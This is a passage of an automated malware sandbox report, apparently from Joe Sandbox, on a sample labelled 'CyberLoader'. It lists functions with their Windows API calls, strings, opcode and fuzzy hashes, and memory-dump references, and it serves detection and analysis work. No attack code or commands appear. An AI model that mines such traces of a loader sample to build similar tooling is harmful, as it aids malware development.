                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 0dbf8e6470d24ef6245fb30e1059e1fa381c144d4dab521f2111c32f1d8809f6
                                                  • Instruction ID: 96d65d1fbb9973ea4f25cf38f366e86d8a9ea2545ceb5c33ff887a40be71427e
                                                  • Opcode Fuzzy Hash: 0dbf8e6470d24ef6245fb30e1059e1fa381c144d4dab521f2111c32f1d8809f6
                                                  • Instruction Fuzzy Hash: 35A0029D57E1027D311D75516D16D76036CC4D5F51370491AF50A944D2A9C05C6D9531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEndOfFile.KERNELBASE(?,00279104,?,?,-00001964), ref: 00279EC2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File
                                                  • String ID:
                                                  • API String ID: 749574446-0
                                                  • Opcode ID: e05c266ecf7e6e5fbb851ad17c9b295a91e6e38334d94a874cc99287fae66547
                                                  • Instruction ID: 16ed71f2eb606d8f3844d762026c88dadf41ea9fef7134e275b3d8e4c9a083b1
                                                  • Opcode Fuzzy Hash: e05c266ecf7e6e5fbb851ad17c9b295a91e6e38334d94a874cc99287fae66547
                                                  • Instruction Fuzzy Hash: 56B011320A000A8B8E002B30EC08828BA20EA2230A30082A0B002CA0A0CF22C002AA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetCurrentDirectoryW.KERNELBASE(?,0028A587,C:\Users\user\Desktop,00000000,002B946A,00000006), ref: 0028A326
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID:
                                                  • API String ID: 1611563598-0
                                                  • Opcode ID: c63a14ae5d1365434eec37e49bfe2ef34e51342efb7c5f4955b59cff2ed26080
                                                  • Instruction ID: 887cca0b49baac13d2669ceec3ac94512ae3f65cd341d82505336c1dce24c0c4
                                                  • Opcode Fuzzy Hash: c63a14ae5d1365434eec37e49bfe2ef34e51342efb7c5f4955b59cff2ed26080
                                                  • Instruction Fuzzy Hash: 27A01230194006578E004B30DC0DC1576509761702F0086207006C00A0CF308814A500
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0028B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0028B971
                                                  • EndDialog.USER32(?,00000006), ref: 0028B984
                                                  • GetDlgItem.USER32(?,0000006C), ref: 0028B9A0
                                                  • SetFocus.USER32(00000000), ref: 0028B9A7
                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0028B9E1
                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0028BA18
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0028BA2E
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028BA4C
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028BA5C
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028BA78
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028BA94
                                                  • _swprintf.LIBCMT ref: 0028BAC4
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0028BAD7
                                                  • FindClose.KERNEL32(00000000), ref: 0028BADE
                                                  • _swprintf.LIBCMT ref: 0028BB37
                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0028BB4A
                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0028BB67
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0028BB87
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028BB97
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028BBB1
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028BBC9
                                                  • _swprintf.LIBCMT ref: 0028BBF5
                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0028BC08
                                                  • _swprintf.LIBCMT ref: 0028BC5C
                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0028BC6F
                                                    • Part of subcall function 0028A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028A662
                                                    • Part of subcall function 0028A63C: GetNumberFormatW.KERNEL32 ref: 0028A6B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                  • API String ID: 797121971-1840816070
                                                  • Opcode ID: 47c9f29ac624ed5f35fe9a65d5d39603982bf1178e86e793e3e878e71625f82f
                                                  • Instruction ID: 474e104a7d444c89852a3d9e9e73c90689210e6dac1d197b85a5356d2dd9c12f
                                                  • Opcode Fuzzy Hash: 47c9f29ac624ed5f35fe9a65d5d39603982bf1178e86e793e3e878e71625f82f
                                                  • Instruction Fuzzy Hash: 4091A372555348BFD621EBA0DC4DFFBB7ACEB4A700F04481AF749D2091DB71AA148B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00277191
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 002772F1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00277301
                                                    • Part of subcall function 00277BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277C04
                                                    • Part of subcall function 00277BF5: GetLastError.KERNEL32 ref: 00277C4A
                                                    • Part of subcall function 00277BF5: CloseHandle.KERNEL32(?), ref: 00277C59
                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0027730C
                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0027741A
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00277446
                                                  • CloseHandle.KERNEL32(?), ref: 00277457
                                                  • GetLastError.KERNEL32 ref: 00277467
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 002774B3
                                                  • DeleteFileW.KERNEL32(?), ref: 002774DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                  • API String ID: 3935142422-3508440684
                                                  • Opcode ID: e687c3d24a7dec7e2a52ec0f142a710650cb3341d06cd3d90d06aaeb4439753a
                                                  • Instruction ID: a91141a277dec88f96c2708c82129c6ac3015431f4aa7ba14f37fe0917023826
                                                  • Opcode Fuzzy Hash: e687c3d24a7dec7e2a52ec0f142a710650cb3341d06cd3d90d06aaeb4439753a
                                                  • Instruction Fuzzy Hash: 2CB1F371924215ABDF21DFA4DC85BEEB7B8BF05300F0081A9F949E7142DB34AA59CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028A662
                                                  • GetNumberFormatW.KERNEL32 ref: 0028A6B1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FormatInfoLocaleNumber
                                                  • String ID:
                                                  • API String ID: 2169056816-0
                                                  • Opcode ID: 1bfab6ab45647e3656f5abbd08a6c9b25ea6c84a8c338e9db1026c18c381a801
                                                  • Instruction ID: 024f0c8eac5a178329743ac62316260f34216c91b86ca7b3e425191994685493
                                                  • Opcode Fuzzy Hash: 1bfab6ab45647e3656f5abbd08a6c9b25ea6c84a8c338e9db1026c18c381a801
                                                  • Instruction Fuzzy Hash: AF017136550208BFDB10DF64EC49F9B77BCEF1A710F014822FA0897150D7709A258BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00276EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(0028117C,?,00000200), ref: 00276EC9
                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00276EEA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: e9dc18dc5f38e30b3fd61d4e69dfe27c91324665512608399e8f3101c8d01693
                                                  • Instruction ID: ea95a72f849feaf94004cebdc50a30e18730e89e3c3ba296d6603c96b6404da7
                                                  • Opcode Fuzzy Hash: e9dc18dc5f38e30b3fd61d4e69dfe27c91324665512608399e8f3101c8d01693
                                                  • Instruction Fuzzy Hash: 0DD0C7353D4302BFEA514A74DC0DF677B546757B42F10D514B357E94D0C97090249625
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 0027AD1A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Version
                                                  • String ID:
                                                  • API String ID: 1889659487-0
                                                  • Opcode ID: 548136265a041a504fdaa301c748961a84d38566272ca62a93f094bbc09aaf49
                                                  • Instruction ID: 02376f6cc0c0f8388166e184312afdae056111e33ec240e3d86bed405a0bd2f6
                                                  • Opcode Fuzzy Hash: 548136265a041a504fdaa301c748961a84d38566272ca62a93f094bbc09aaf49
                                                  • Instruction Fuzzy Hash: DDF01DB0E1021C8BCB38CF58FC896EA73B5F799711F204295DA1953754DBB0AD50CE61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _swprintf.LIBCMT ref: 0027DABE
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                    • Part of subcall function 00281596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,002B0EE8,00000200,0027D202,00000000,?,00000050,002B0EE8), ref: 002815B3
                                                  • _strlen.LIBCMT ref: 0027DADF
                                                  • SetDlgItemTextW.USER32(?,002AE154,?), ref: 0027DB3F
                                                  • GetWindowRect.USER32(?,?), ref: 0027DB79
                                                  • GetClientRect.USER32(?,?), ref: 0027DB85
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0027DC25
                                                  • GetWindowRect.USER32(?,?), ref: 0027DC52
                                                  • SetWindowTextW.USER32(?,?), ref: 0027DC95
                                                  • GetSystemMetrics.USER32(00000008), ref: 0027DC9D
                                                  • GetWindow.USER32(?,00000005), ref: 0027DCA8
                                                  • GetWindowRect.USER32(00000000,?), ref: 0027DCD5
                                                  • GetWindow.USER32(00000000,00000002), ref: 0027DD47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                  • String ID: $%s:$CAPTION$T*$d
                                                  • API String ID: 2407758923-4076971296
                                                  • Opcode ID: be73659f3a19b17144de59eccf134864f5dfd18dca0b8c8a0e5475bc2ad88d84
                                                  • Instruction ID: e1dfd72217488a93a5637f0c69bd73e5de5431b77e5ff63f7ec92e158bba20ff
                                                  • Opcode Fuzzy Hash: be73659f3a19b17144de59eccf134864f5dfd18dca0b8c8a0e5475bc2ad88d84
                                                  • Instruction Fuzzy Hash: 4A81C172518302AFD710DF68DD88B6BBBF9EF89704F04891DFA8893251D670E819CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0029C277
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE2F
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE41
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE53
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE65
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE77
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE89
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BE9B
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEAD
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEBF
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BED1
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEE3
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BEF5
                                                    • Part of subcall function 0029BE12: _free.LIBCMT ref: 0029BF07
                                                  • _free.LIBCMT ref: 0029C26C
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 0029C28E
                                                  • _free.LIBCMT ref: 0029C2A3
                                                  • _free.LIBCMT ref: 0029C2AE
                                                  • _free.LIBCMT ref: 0029C2D0
                                                  • _free.LIBCMT ref: 0029C2E3
                                                  • _free.LIBCMT ref: 0029C2F1
                                                  • _free.LIBCMT ref: 0029C2FC
                                                  • _free.LIBCMT ref: 0029C334
                                                  • _free.LIBCMT ref: 0029C33B
                                                  • _free.LIBCMT ref: 0029C358
                                                  • _free.LIBCMT ref: 0029C370
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID: P*
                                                  • API String ID: 161543041-889178550
                                                  • Opcode ID: 2a85f8b5734757d09a3cb3878f800254ad1f2d25b8e9b8f8d9b6573d94e307e3
                                                  • Instruction ID: 9b47f9919738d4fab1a9e6f071391c82ab6328fd0df43db00ef0c50496479c68
                                                  • Opcode Fuzzy Hash: 2a85f8b5734757d09a3cb3878f800254ad1f2d25b8e9b8f8d9b6573d94e307e3
                                                  • Instruction Fuzzy Hash: 46318D32A202069FEF20AF78D945B5A73E9FF02310F258469E448D7551EF31FC609B24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindow.USER32(?,00000005), ref: 0028CD51
                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0028CD7D
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0028CD99
                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0028CDB0
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028CDC4
                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0028CDED
                                                  • DeleteObject.GDI32(00000000), ref: 0028CDF4
                                                  • GetWindow.USER32(00000000,00000002), ref: 0028CDFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                  • String ID: STATIC
                                                  • API String ID: 3820355801-1882779555
                                                  • Opcode ID: 30a3e9a6efe42766d434db51d78458e4f284b8e141d78ad7f1fa325934f538d2
                                                  • Instruction ID: a1bf54137b89b39b4454e7719a4c59c57641dc77069b8e0f02f620d7667c588d
                                                  • Opcode Fuzzy Hash: 30a3e9a6efe42766d434db51d78458e4f284b8e141d78ad7f1fa325934f538d2
                                                  • Instruction Fuzzy Hash: 69112E3A553311BBD7217F209C0DF6F775CAB65742F104022FA45A11D2DB708D2987B4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00298EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00298EC5
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 00298ED1
                                                  • _free.LIBCMT ref: 00298EDC
                                                  • _free.LIBCMT ref: 00298EE7
                                                  • _free.LIBCMT ref: 00298EF2
                                                  • _free.LIBCMT ref: 00298EFD
                                                  • _free.LIBCMT ref: 00298F08
                                                  • _free.LIBCMT ref: 00298F13
                                                  • _free.LIBCMT ref: 00298F1E
                                                  • _free.LIBCMT ref: 00298F2C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: ff7785f84c26a626d2ab15a8ab3ec0d95d5f4e894f3c8c179dd0f8e1ae1086d1
                                                  • Instruction ID: d5196d35ea0dc146951c14f18f784273123fe7ab051c0bd1f6add5d2b8d2883a
                                                  • Opcode Fuzzy Hash: ff7785f84c26a626d2ab15a8ab3ec0d95d5f4e894f3c8c179dd0f8e1ae1086d1
                                                  • Instruction Fuzzy Hash: 2611A47652010DAFCF11EF54C942CDA3BA5FF06350B5A50A5BA088B626EA31EA61DF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00272162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
